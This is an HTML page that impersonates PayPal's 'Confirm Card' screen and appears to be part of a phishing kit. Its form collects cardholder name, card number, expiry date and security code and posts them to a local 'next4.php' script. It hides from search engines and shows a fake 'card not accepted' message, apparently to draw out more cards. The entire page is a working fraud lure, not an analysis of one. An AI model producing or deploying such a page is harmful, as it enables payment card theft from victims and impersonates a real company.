<!DOCTYPE html>
<html>

<head>
<title>PayPal: Confirm Card</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=yes">
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, noydir">
<link rel="shortcut icon" href="assets/img/favicon.ico">
<link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
<link rel="stylesheet" href="assets/css/myaccount_app.css">
<link rel="stylesheet" href="assets/css/myaccount_wallet.css">
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.mask.js"></script>
<script src="assets/js/jquery.validate.js"></script>
<script src="assets/js/myaccount.card.js"></script>
</head>

<body>
<section class="theoverpanel">
<div class="overpanel-wrapper row">
<div class="overpanel-content col-xs-12 col-xs-offset-0 col-sm-8 col-sm-offset-2 col-md-4 col-md-offset-4">
<div class="overpanel-header">
<h2>Confirm Card</h2>
</div>
<div class="twbs_alert vx_alert vx_alert-critical js_alertMsg hide" id="MSGError">
<p class="vx_alert-text">
<font size="2">
This card is not accepted. Please use a different card.
</font>
</p>
</div>
<div class="overpanel-body">
<form name="addCreditOrDebit" action="next4.php" method="post" id="login_form" autocomplete="off" onsubmit="">
<div class="textInput lap" id="DivName">
<input type="text" placeholder="Cardholder Name" id="Name" name="cardholder">
</div>
<div class="creditCardInput clearfix">
<div class="creditCardInput-layout">
<div class="cardNumber" id="cardNumber">
<div class="textInput ccNumber ccNumber ccNum lap" id="DivNumber">
<input type="tel" placeholder="Card Number" id="Number" name="cardnum">
</div>
<div class="cardLogo">
<span class="fiModule-icon_card" id="DivLogo"></span>
</div>
</div>
<div class="cardInputs">
<div class="expiration js_card_toggleField">
<div class="textInput expirationDate js_expirationDate expirationDate expirationDate lap" id="DivExp">
<input type="tel" placeholder="Expiration Date" id="Exp" name="cardexp">
</div>
</div>
<div class="js_card_toggleField" id="cardSecurityCode">
<div class="textInput csc pull-right csc securityCode lap" id="DivCvv" data-ctype="">
<input type="tel" placeholder="Security Code" id="Cvv" name="cardcvv">
</div>
</div>
</div>
</div>
</div>
<input class="vx_btn" type="submit" value="Confirm" id="btnConfirm">
<p class="scretlogo"></p>
</form>
</div>
</div>
</div>
<div class="hasSpinner hide" id="loding"></div>
</section>
<script src="assets/js/card.post.js"></script>
</body>

</html>
